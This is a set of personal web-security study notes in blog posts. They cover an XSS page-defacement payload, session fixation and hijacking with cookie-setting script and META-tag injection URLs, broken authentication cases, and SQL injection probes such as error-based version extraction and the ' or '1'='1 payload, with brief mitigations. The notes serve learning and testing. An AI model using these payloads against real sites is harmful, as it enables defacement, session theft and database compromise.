<b>Exploit 3 : </b><br />
Attacker can deface a page with its own page or pic or photo<br />
Palyload<br />
<img src=link of the image><br />
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script><br />
<br />
<b>Exploit 4 :</b><br />
BEF = Browser Exploitation Framework<br />
<br />
http://www.hacking-tutorial.com/hacking-tutorial/xss-attack-hacking-using-beef-xss-framework/#sthash.kypFITWL.dpbs<br />
<br />
<br />
<br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-76052440910406894182018-06-18T07:40:00.001-07:002018-06-18T07:58:39.683-07:00Session_ALL about Session <div dir="ltr" style="text-align: left;" trbidi="on">
Session ID is not updating after login<br />
<span style="white-space: pre;"> </span>This attack is done locally: for example => in an organization someone log out and the session is not expired, he/she may try login into it by using that session again<br />
<span style="white-space: pre;"> </span><br />
Attack Scenario: Setting Session ID help of XSS<br />
<br />
*************************<br />
All about <a href="http://prasoon-nigam.blogspot.com/2018/06/broken-authentication-and-session.html" target="_blank">broken-authentication-and-session</a><br />
<a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection and Defense</a><br />
*************************************************<br />
<br />
Session Fixation<br />
======================<br />
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by the knowledge of the user session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.<br />
<br />
The session fixation attack is a class of Session Hijacking, which steals the established session between the client and the Web Server after the user logs in. Instead, the Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in.<br />
<br />
There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common techniques:<br />
<br />
• Session token in the URL argument: The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.<br />
<br />
• Session token in a hidden form field: In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in the evil web server or directly in HTML formatted e-mail.<br />
<br />
• Session ID in a cookie:<br />
<br />
o Client-side script<br />
<br />
Most browsers support the execution of client-side scripting. In this case, the aggressor could use attacks of code injection as the XSS (Cross-site scripting) attack to insert a malicious code in the hyperlink sent to the victim and fix a Session ID in its cookie. Using the function document.cookie, the browser which executes the command becomes capable of fixing values inside of the cookie that it will use to keep a session between the client and the Web Application.<br />
<br />
o <META> tag<br />
<br />
<META> tag also is considered a code injection attack, however, different from the XSS attack where undesirable scripts can be disabled, or the execution can be denied. The attack using this method becomes much more efficient because it's impossible to disable the processing of these tags in the browsers.<br />
<br />
o HTTP header response<br />
<br />
This method explores the server response to fix the Session ID in the victim's browser. Including the parameter Set-Cookie in the HTTP header response, the attacker is able to insert the value of Session ID in the cookie and sends it to the victim's browser.<br />
<br />
*************************<br />
Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
All about <a href="http://prasoon-nigam.blogspot.com/2018/06/broken-authentication-and-session.html" target="_blank">broken-authentication-and-session</a><br />
<a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection and Defense</a><br />
*************************************************<br />
<br />
<br />
Session hijacking<br />
======================<br />
The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.<br />
<br />
Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the HTTP requisition as a cookie, in other parts of the header of the HTTP request, or yet in the body of the HTTP requisition.<br />
<br />
The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.<br />
<br />
The session token could be compromised in different ways; the most common are:<br />
<br />
Predictable session token;<br />
Session Sniffing;<br />
Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);<br />
Man-in-the-middle attack<br />
Man-in-the-browser attack</div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-22725456961144818282018-06-18T07:20:00.000-07:002018-06-18T07:58:53.533-07:00Broken Authentication and Session Management<div dir="ltr" style="text-align: left;" trbidi="on">
Broken Authentication and Session Management<br />
===============================================<br />
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords,keys,or session tokens, or to exploit other implementation flaws to assume other user's identities.<br />
<span style="white-space: pre;"> </span><br />
Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, time-outs, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique<br />
<br />
Session IDs<br />
=================<br />
A Session is a unique identifier....<br />
As we know that HTTP is a stateless protocol, which means that it provides no integrated way for a web server to maintain states throughout user’s subsequent requests.<br />
A session identifier, session ID or session token is a piece of data that is used in network communications (often over HTTP) to identify a session, a series of related message exchanges. Session identifiers become necessary in cases where the communications infrastructure uses a stateless protocol such as HTTP.<br />
For example, a buyer who visits a seller's site wants to collect a number of articles in a virtual shopping cart and then finalize the shopping by going to the site's checkout page. This typically involves an ongoing communication where several web pages are requested by the client and sent back to them by the server. In such a situation, it is vital to keep track of the current state of the shopper's cart, and a session ID is one way to achieve that goal.<br />
<br />
A session ID is typically granted to a visitor on his first visit to a site. It is different from a user ID in that sessions are typically short-lived (they expire after a preset time of inactivity which may be minutes or hours) and may become invalid after a certain goal has been met (for example, once the buyer has finalized his order, he cannot use the same session ID to add more items).<br />
<br />
Three widely used methods for maintaining sessions in WEB<br />
=======================================================<br />
1) URL arguments<br />
2) Hidden form fields<br />
3) Cookies (cookies have proven to be the most convenient)<br />
<br />
************************************<br />
Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
Basics for SQL Injection and Remediations => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">Click on me :)</a><br />
Nmap with Metasploits => <a href="http://prasoon-nigam.blogspot.com/2015/05/nmap-in-metasploit.html" target="_blank">Click one me :)</a><br />
*************************************************************<br />
<br />
<br />
Session Management<br />
=====================<br />
Session management is the process of keeping track of a user's activity across sessions of interaction with the computer system.<br />
Types<br />
======<br />
Desktop session management => A desktop session manager is a program that can save and restore desktop sessions. A desktop session is all the windows currently running and their current content.<br />
<br />
Browser session management => Session management is particularly useful in a web browser where a user can save all open pages and settings and restore them at a later date. To help recover from a system or application crash, pages and settings can also be restored on next run.<br />
<br />
Web Server Session management => Hypertext Transfer Protocol (HTTP) is stateless: a client computer running a web browser must establish a new Transmission Control Protocol (TCP) network connection to the web server with each new HTTP GET or POST request. The web server, therefore, cannot rely on an established TCP network connection for longer than a single HTTP GET or POST operation. Session management is the technique used by the web developer to make the stateless HTTP protocol support session state. For example, once a user has been authenticated to the web server, the user's next HTTP request (GET or POST) should not cause the web server to ask for the user's account and password again. For a discussion of the methods used to accomplish this see HTTP cookie and Session ID<br />
<br />
Session management over SMS =><br />
<br />
Vulnerabilities<br />
===========================<br />
> User authentication credentials aren’t protected when stored using hashing or encryption.<br />
> Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).<br />
> Session IDs are exposed in the URL (e.g., URL rewriting).<br />
> Session IDs are vulnerable to session fixation attacks.<br />
> Session IDs don’t time-out, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.<br />
> Session IDs aren’t rotated after successful login.<br />
> Passwords, session IDs, and other credentials are sent over unencrypted connections.<br />
<br />
<br />
Attacks Done on Session IDs<br />
=====================================<br />
1) Session Hijacking => The attacker gains access to the user’s session by obtaining his session ID, is called session hijacking<br />
2) Session fixation => The attacker fixes the user’s session ID before the user even logs into the target server, thereby eliminating the need to obtain the user’s session ID afterwards.<br />
<span style="white-space: pre;"> </span>Attacks made in session fixation =><span style="white-space: pre;"> </span><br />
<span style="white-space: pre;"> </span>*) Interception<span style="white-space: pre;"> </span>(Encrypted communication effectively protects against interception)<br />
<span style="white-space: pre;"> </span>*) Prediction<span style="white-space: pre;"> </span>(Cryptographically strong pseudo random number generators and carefully chosen seeds that don’t leak from the serve prevents prediction of session IDs)<br />
<span style="white-space: pre;"> </span>*) Brute-force <span style="white-space: pre;"> </span>(Bit-length is large enough with respect to the number of simultaneous sessions)<br />
<br />
Session fixation vs. session hijacking<br />
==========================================<br />
Timing<br />
Session fixation : Attacker attacks the user’s browser before he logs in to the target server.<br />
Session hijacking : Attacker attacks the user’s browser after he logs in to the target server.<br />
<br />
Impact Duration<br />
Session fixation : Attacker gains one-time, temporary or long-term access to the user’s session(s).<br />
Session hijacking : Attacker usually gains one-time access to the user’s session and has to repeat the attack in order to gain access to another one.<br />
<br />
Session Maintenance<br />
Session fixation : Can require the attacker to maintain the trap session until the user logs into it.<br />
Session hijacking : Requires no session maintenance.<br />
<br />
Attack Vectors<br />
Session fixation<br />
<span style="white-space: pre;"> </span>1. Tricking the user to log in through a malicious hyperlink or a malicious login form<br />
<span style="white-space: pre;"> </span>2. Exploiting a cross-site scripting vulnerability on any web<span style="white-space: pre;"> </span>server in the target server’s domain<br />
<span style="white-space: pre;"> </span>3. Exploiting a meta tag injection vulnerability on any web server in the target server’s domain<br />
<span style="white-space: pre;"> </span>4. Exploiting the “session adoption” feature of some web servers<br />
<span style="white-space: pre;"> </span>5. Breaking into any host in the target server’s domain<br />
<span style="white-space: pre;"> </span>6. Adding a domain cookie-issuing server to the target server’s domain in the user’s DNS server<br />
<span style="white-space: pre;"> </span>7. Network traffic modification<br />
<br />
Session hijacking<br />
<span style="white-space: pre;"> </span>1. Exploiting a cross-site scripting vulnerability on the target server<br />
<span style="white-space: pre;"> </span>2. Obtaining the session ID in the HTTP Referer header sent to another web server<br />
<span style="white-space: pre;"> </span>3. Network traffic sniffing (only works with an unencrypted link to the target server)<br />
<br />
Attack Target Area<br />
<span style="white-space: pre;"> </span>Session fixation : Communication link, target web server, all hosts in target server’s domain, user’s DNS server<br />
<span style="white-space: pre;"> </span>Session hijacking : Communication link, target web server<br />
<span style="white-space: pre;"> </span><br />
<br />
Mitigation<br />
===============<br />
1) HTTPonly<br />
2) Secure flag if HTTPS is there<br />
3) Encrypted communication between the user’s browser and the target web server<br />
4) Ensuring that sessions expire and within a reasonable period of time<br />
<br />
Broken Authentication and Session Management Cases<br />
=====================================================<br />
Case 1:<span style="white-space: pre;"> </span><br />
Plain text storage of password<br />
Storing a password in plaintext may result in a system compromise<br />
Attacker can sniff the network with the help of any sniffing tool (such as wire-shark)<br />
<br />
Case 2:<span style="white-space: pre;"> </span><br />
Improper Authentication<span style="white-space: pre;"> </span><br />
The user claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.<br />
<br />
Case 3:<br />
Missing Encryption of Sensitive Data<br />
The software/website does not encrypt sensitive or critical information before storage or transmission<br />
The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys.<br />
For example : Storage for credit card no. or pin, user info or password<br />
<br />
Case 4:<span style="white-space: pre;"> </span><br />
Clear text Transmission of Sensitive Information<span style="white-space: pre;"> </span><br />
The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by an attacker.<br />
Many communication channels can be "sniffed" by attackers during data transmission. For example, network traffic can often be sniffed by an attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.<br />
<br />
Case 5:<br />
Session Fixation<span style="white-space: pre;"> </span><br />
Read above for session fixation<br />
<br />
Case 6:<br />
Insufficiently Protected Credentials<br />
Login pages not using adequate measures to protect the username and password while they are in transit from the client to the server<br />
Use SSL<br />
<span style="white-space: pre;"> </span><br />
Case 7:<br />
Insufficient Session Expiration<span style="white-space: pre;"> </span><br />
"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."<br />
The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a website from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser's back button to access web pages previously accessed by the victim.<br />
> Set sessions/credentials expiration date<br />
<br />
Case 8:<br />
Unverified Password Change<br />
When setting a new password for a user, the product does not require knowledge of the original password or using another form of authentication.<br />
This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user. (may lead to CSRF)<br />
<br />
Case 9:<br />
Weak Password Recovery Mechanism for Forgotten Password<span style="white-space: pre;"> </span><br />
The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.<br />
It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user's account.(May lead to Brute force attack)<br />
This weakness may be that the security question is too easy to guess or find an answer to (e.g. because it is too common). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system's weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system. Weak password recovery schemes completely undermine a strong password<br />
<br />
<br />
Exploitation With SessionId<br />
================================<br />
IMP : https://www.exploit-db.com/papers/15990/<br />
=============<br />
<br />
Exploit 1 : Session Fixation<br />
A bank website, Session IDs are transported from browser to server within a URL argument sessionid.<br />
<br />
The attacker – who in this case is also a legitimate user of the system – logs into the server and is issued a session ID 1234. The attacker then sends a hyperlink<br />
http://online.worldbank.dom/login.jsp?sessionid=1234 to the victim, trying to lure him into clicking on it. The victim clicks on the link, which opens the server’s login page in his browser.<br />
Note that upon request for login.jsp?sessionid=1234, the web application has established that a session already exists for this user and a new one need not be created. Finally, the user provides his credentials to the login script and the server grants him access to his bank account. However, at this point, knowing the session ID, the attacker can also access the victim's account via account.jsp?sessionid=1234. Since the session has already been fixed before the user logged in, we say that the user logged into the attacker’s session.<span style="white-space: pre;"> </span><br />
<br />
Attackers Uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234”;</script>.idc to fix the session id in to victim browser<br />
<br />
For Domain Cookies fixation<br />
Attacker uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234;domain=.worldbank.dom”;</script>.idc<br />
<br />
Meta tag injection<br />
====================<br />
Issuing a cookie using the <META> tag with Set-Cookie attribute<br />
<meta http-equiv=Set-Cookie content="sessionid=1234"><br />
<br />
http://online.worldbank.dom/<meta%20http-equiv=Set-Cookie%20content="sessionid=1234;%20Expires=Friday,%201-Jan-2010%2000:00:00%20GMT”>.idc<br />
<br />
Exploit 2 : Network Base attack (man in the middle attack)<br />
Sniffing the packets with in the network coming to and from the victim computer<br />
<br />
The attacker can inject a small (invisible) image in any web server’s response to the browser – for example when the user is reading Yahoo news. This image would originate from any web server in the .website.com domain. Upon requesting the image content, the browser would connect to this web server and the attacker, intercepting the request, could send a fake response by the web server, including a Set-Cookie header, thereby fixing the user’s session.<br />
<br />
Exploit 3 : Prediction<br />
The attacker can predict the session if session ids are not unique or random numbers are no coming<br />
For example :<br />
The session id is 123456<br />
session id2 is 123456789<br />
session id3 is predictable may be 123456789101112<br />
<br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-4140086934254704822018-06-05T06:02:00.003-07:002018-06-05T07:59:42.144-07:00SQL injection Contd......<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Sql injection is must be tested in headers cookies and parameters with a single quote (') Sql injection is more important then XSS and are always find in Select, create, update and delete where sql queries run... We search for error base entries which are dealing with database must be fuzzed with sql injection and with burp scanner CRUD must not be missed out detection is more important to find new areas of detection jason request, where there is key parameter must not be ignored as they are attached to the database for exploitation.<br />
<br />
************************<br />
Read the => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL injection attack and defense notes</a><br />
*****************************************<br />
<span style="color: red;"><br /></span> <span style="color: red;">SQL map </span><br />
if not exploitable then reduce to likelihood but not the impact is always<br />
<br />
<span style="color: red;"><b>Remediation </b></span><br />
suggest generic remediation and tenchologies based .net php j2ee<br />
<br />
<b>OWSASP guide is best </b>to google search on this<br />
<b><span style="color: red;"> dynamic query </span></b><br />
<span style="white-space: pre;"> </span>Dynamic SQL is a programming technique that enables you to build SQL statements dynamically at runtime. You can create more general purpose, flexible applications by using dynamic SQL because the full text of a SQL statement may be unknown at compilation. For example, dynamic SQL lets you create a procedure that operates on a table whose name is not known until runtime.<br />
<br /><span style="color: red;">Stored procedure functions</span><b><span style="color: red;"> persistent query </span></b><br />
<b><span style="color: red;"> prepared statement </span></b><br />
<span style="color: red;">parameterized query (pre-compiled statement )</span> imp<br />
A parameterized query (also known as a prepared statement) is a means of pre-compiling a SQL statement so that all you need to supply are the "parameters" (think "variables") that need to be inserted into the statement for it to be executed. It's commonly used as a means of preventing SQL injection attacks php .net jsp is different.<br />
<br /><br /><br />
************************<br />
Read the => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL injection attack and defense notes</a><br />
*****************************************</div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-30345054081850584482018-06-05T05:54:00.002-07:002018-06-18T07:57:33.475-07:00SQL injection attack and defense notes <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUx3pNwm-OXVwUvGyo-uoodH11TujfQAt4pnlG83WRTnrvn-1RaFOGzLVntDI5nvHi8UAQTeg3hHdRrgIKNdkI0KGFD35_WPZRlATbBk1jHoQrgU8x3nfH6VWR-2vZ2s7HlCGWLp8BNg8/s1600/download.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="163" data-original-width="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUx3pNwm-OXVwUvGyo-uoodH11TujfQAt4pnlG83WRTnrvn-1RaFOGzLVntDI5nvHi8UAQTeg3hHdRrgIKNdkI0KGFD35_WPZRlATbBk1jHoQrgU8x3nfH6VWR-2vZ2s7HlCGWLp8BNg8/s1600/download.jpg" /></a></div>
<br />
<br />
SQL injection vulnerabilities most commonly occur when the Web application developer does not ensure that values received from a Web form, cookie, input parameter, and so forth are validated or encoded before passing them to SQL queries that will be executed on a database server.<br />
<br />
If an attacker can control the input that is sent to an SQL query and manipulate that input so that the data is interpreted as code instead of as data, he may be able to execute code on the back-end database.<br />
<br />
Without a sound understanding of the underlying database that they are interacting with or a thorough understanding and awareness of the potential security issues<br />
of the code that is being developed, application developers can often produce inherently insecure applications that are vulnerable to SQL injection<br />
<br />
What is the impact of an SQL injection vulnerability?<br />
A: This depends on many variables; however, potentially an attacker can manipulate data in the database, extract much more data than the application should allow, and possibly execute operating system commands on the database server<br />
<br />
Is SQL injection a new vulnerability?<br />
A: No. SQL injection has probably existed since SQL databases were first connected to Web applications. However, it was brought to the attention of the public on Christmas Day 1998.<br />
<br />
Can Web sites be immune to SQL injection if they do not allow the quote character to be entered?<br />
A: No. There is a myriad of ways to encode the quote character so that it is accepted as input, and some SQL injection vulnerabilities can be exploited without using it at all. Also, the quote character is not the only character that can be used to exploit SQL injection vulnerabilities; a number of characters are available to an attacker, such as the double pipe (||) and double quote (“), among others.<br />
<br />
Q: My application is written in PHP/ASP/Perl/.NET/Java, etc. Is my chosen language immune?<br />
A: No. Any programming language that does not validate input before passing it to a dynamically created SQL statement is potentially vulnerable; that is, unless it uses parameterized queries and bind variables.<br />
<br />
**********************<br />
Learn more on => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-contd.html" target="_blank">SQL injection Contd......</a><br />
Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
************************************************<br />
<br />
Finding SQL Injection<br />
=========================<br />
The Web browser is a client acting as a front-end requesting data from the user and sending it to the remote server which will create SQL queries using the submitted data. Our main goal at this stage is to identify anomalies in the server response and determine whether they are generated by an SQL injection vulnerability.<br />
<br />
<br />
Testing by Inference<br />
There is one simple rule for identifying SQL injection vulnerabilities: Trigger anomalies by<br />
sending unexpected data. This rule implies that:<br />
■■ You identify all the data entry on the Web application.<br />
■■ You know what kind of request might trigger anomalies.<br />
■■ You detect anomalies in the response from the server.<br />
<br />
The two most method are GET and POST<br />
Now Get send everything in URL<br />
for exampe :- GET /search.aspx?text=lcd%20monitors&cat=1&num=20 HTTP/1.1<br />
ex-2<br />
This kind of request sends parameters within the URLs in the following format:<br />
?parameter1=value1&parameter2=value2&parameter3=value3...<br />
<br />
POST = POST method is basically used when u fill the form, the value are sent at the bottom of the request<br />
<br />
POST /contact/index.asp HTTP/1.1<br />
<br />
Content-Length: 129<br />
first=John&last=Doe&email=john@doe.com&phone=555123456&title=Mr&country=US&comments=<br />
I%20would%20like%20to%20request%20information<br />
<br />
<b><span style="color: red;">Manipulating Parameter</span></b><br />
For example, u have an URL<br />
http://www.victim.com/showproducts.php?category=bikes<br />
http://www.victim.com/showproducts.php?category=cars<br />
http://www.victim.com/showproducts.php?category=boats<br />
<br />
The showproducts.php page receives a parameter called category. we don't have type anything but click on link and u r redirected<br />
<br />
but if u change http://www.victim.com/showproducts.php?category=attacker<br />
<br />
you get SQL error<br />
In the preceding example, we sent a request to the server with a non-existent category<br />
name. The response from the server was as follows:<br />
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproducts.php on line 34<br />
<br />
**********************<br />
Learn more on => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-contd.html" target="_blank">SQL injection Contd......</a><br />
************************************************<br />
<br />
Another interesting test you can conduct to identify vulnerabilities in Microsoft SQL Server and Oracle is to send the following two requests to the Web server:<br />
http://www.victim.com/showproducts.php?category=bikes<br />
http://www.victim.com/showproducts.php?category=bi'+'kes<br />
The MySQL equivalent is:<br />
http://www.victim.com/showproducts.php?category=bikes<br />
http://www.victim.com/showproducts.php?category=bi' 'kes<br />
<br />
If the result of both requests is the same, there is a high possibility that there is an SQL injection vulnerability.<br />
<br />
<span style="color: red;">SQL injection vulnerabilities occur for two reasons:</span><br />
■■ Lack of user input sanitization<br />
■■ Data and control structures mixed in the same transport channel<br />
<br />
handled as a result of one of the following:<br />
The SQL error ■■ is displayed on the page and is visible to the user from the<br />
Web browser.<br />
■■ The SQL error is hidden in the source of the Web page for debugging purposes.<br />
■■ Redirection to another page is used when an error is detected.<br />
■■ An HTTP error code 500 (Internal Server Error) or HTTP redirection code 302<br />
is returned.<br />
■■ The application handles the error properly and simply shows no results, perhaps<br />
displaying a generic error page.<br />
<br />
<br />
<b><span style="color: red;">Commonly Displayed SQL Errors</span></b><br />
===============================<br />
<br />
Microsoft SQL Server Errors<br />
<br />
Consider the following request:<br />
http://www.victim.com/showproducts.aspx?category=attacker'<br />
The error returned from the remote application will be similar to the following:<br />
Server Error in '/' Application.<br />
Unclosed quotation mark before the character string 'attacker;'.<br />
<br />
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.<br />
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation<br />
<br />
Imagine you find a page called showproduct.aspx in the victim.com application.<br />
The script receives a parameter called id and displays a single product depending on the value<br />
of the id parameter:<br />
http://www.victim.com/showproduct.aspx?id=2<br />
When you change the value of the id parameter to something such as the following:<br />
http://www.victim.com/showproduct.aspx?id=attacker<br />
the application returns an error similar to this:<br />
Server Error in '/' Application.<br />
Invalid column name 'attacker'.<br />
Description: An unhandled exception occurred during the execution of the<br />
current web request. Please review the stack trace for more information<br />
about the error and where it originated in the code.<br />
Exception Details: System.Data.SqlClient.SqlException: Invalid column name<br />
'attacker'.<br />
mark before the character string 'attacker;'.<br />
<br />
<br />
Based on the error, you can assume that in the first instance the application creates an<br />
SQL statement such as this:<br />
SELECT * FROM products WHERE idproduct=2<br />
The preceding statement returns a result set with the product whose id product field equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL statement sent to the database server has the following syntax:<br />
Testing for SQL Injection<br />
SELECT * FROM products WHERE idproduct=attacker<br />
The SQL server understands that if the value is not a number it must be a column name.<br />
In this case, the server looks for a column called attacker within the products table. However,<br />
there is no column named attacker, and therefore it returns an error.<br />
There are some techniques that you can use to retrieve information embedded in the<br />
errors returned from the database. The first one generates an error converting a string to an<br />
integer:<br />
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--<br />
Application response:<br />
Server Error in '/' Application.<br />
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft<br />
Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a column of data type int.<br />
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information<br />
about the error and where it originated in the code.<br />
The database reported an error, converting the result of @@version to an integer and displaying its contents. This technique abuses the type conversion functionality in SQL Server. We sent 0/@@version as part of our injected code. As a division operation needs to be executed between two numbers, the database tries to convert the result from the @@version function into a number. When the operation fails the database displays the content of the variable.<br />
You can use this technique to display any variable in the database. The following |<br />
example<br />
uses this technique to display the user variable:<br />
<br />
<br />
<br />
MySQL Errors<br />
A common configuration is formed by an Apache Web server running PHP on a Linux operating system, but you can find it in many other scenarios as well. The following error is usually an indication of a MySQL injection vulnerability:<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproduct.php on line 8<br />
<br />
In this example, the attacker injected a single quote in a GET parameter and the PHP page sent the SQL statement to the database. The following fragment of PHP code shows the vulnerability:<br />
<?php<br />
//Connect to the database<br />
mysql_connect("[database]", "[user]", "[password]") or<br />
//Error checking in case the database is not accessible<br />
die("Could not connect: " . mysql_error());<br />
//Select the database<br />
mysql_select_db("[database_name]");<br />
<br />
<br />
When an application running the preceding code catches database errors and the SQL query fails, the returned HTML document will include the error returned by the database. If an attacker modifies a string parameter by adding a single quote the server will return<br />
output similar to the following:<br />
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br />
<br />
The preceding output provides information regarding why the SQL query failed. If the<br />
injectable parameter is not a string and therefore is not enclosed between single quotes, the<br />
resultant output would be similar to this:<br />
Error: Unknown column 'attacker' in 'where clause'<br />
<br />
<br />
**********************<br />
Learn more on => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-contd.html" target="_blank">SQL injection Contd......</a><br />
************************************************<br />
<br />
Oracle Errors<br />
<br />
When tampering with the parameters of Java applications with an Oracle back-end<br />
database you will often find the following error:<br />
java.sql.SQLException: ORA-00933: SQL command not properly ended at<br />
oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:180) at<br />
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)<br />
The preceding error is very generic and means that you tried to execute a syntactically<br />
incorrect SQL statement. Depending on the code running on the server you can find the<br />
following error when injecting a single quote:<br />
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not<br />
properly terminated<br />
In this error the Oracle database detects that a quoted string in the SQL statement is not<br />
properly terminated, as Oracle requires that a string be terminated with a single quote. The<br />
following error re-creates the same scenario in .NET environments:<br />
Exception Details: System.Data.OleDb.OleDbException: One or more errors<br />
occurred during processing of command.<br />
ORA-00933: SQL command not properly ended<br />
The following example shows an error returned from a .NET application<br />
<br />
<br />
sql injection payload => bikes’ or ‘1’=’1? to make always true<br />
<br />
<br />
In this example, we injected SQL code that created a meaningful correct query. If the<br />
application is vulnerable to SQL injection, the preceding query should return every row in<br />
the products table. This technique is very useful, as it introduces an always true condition.<br />
‘ or ‘1’=’1 is inserted inline with the current SQL statement and does not affect the<br />
other parts of the request. The complexity of the query doesn’t particularly matter, as we can<br />
easily create a correct statement.<br />
<br />
Another test to perform in this kind of situation is the injection of an always false<br />
statement.<br />
For that we will send a value that generates no results; for example, bikes’<br />
AND ‘1’=’2:<br />
SELECT *<br />
FROM products<br />
WHERE category='bikes' AND '1'='2' /* always false -> returns no rows */<br />
54 Chapter 2 • Testing for SQL Injection<br />
The preceding statement should return no results, as the last condition in the WHERE<br />
clause can never be met. However, keep in mind that things are not always as simple as shown<br />
in these examples, and don’t be surprised if you inject an always false condition and the<br />
application<br />
returns results<br />
<br />
IMP =><br />
<span style="white-space: pre;"> </span>Parameter manipulation<br />
<span style="white-space: pre;"> </span><br />
<span style="color: red;">Mitigation</span> =><br />
<span style="white-space: pre;"> </span>Output encoding<br />
<span style="white-space: pre;"> </span>validation<br />
<span style="white-space: pre;"> </span>sanitization<br />
<br />
**********************<br />
Learn more on => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-contd.html" target="_blank">SQL injection Contd......</a><br />
************************************************</div>
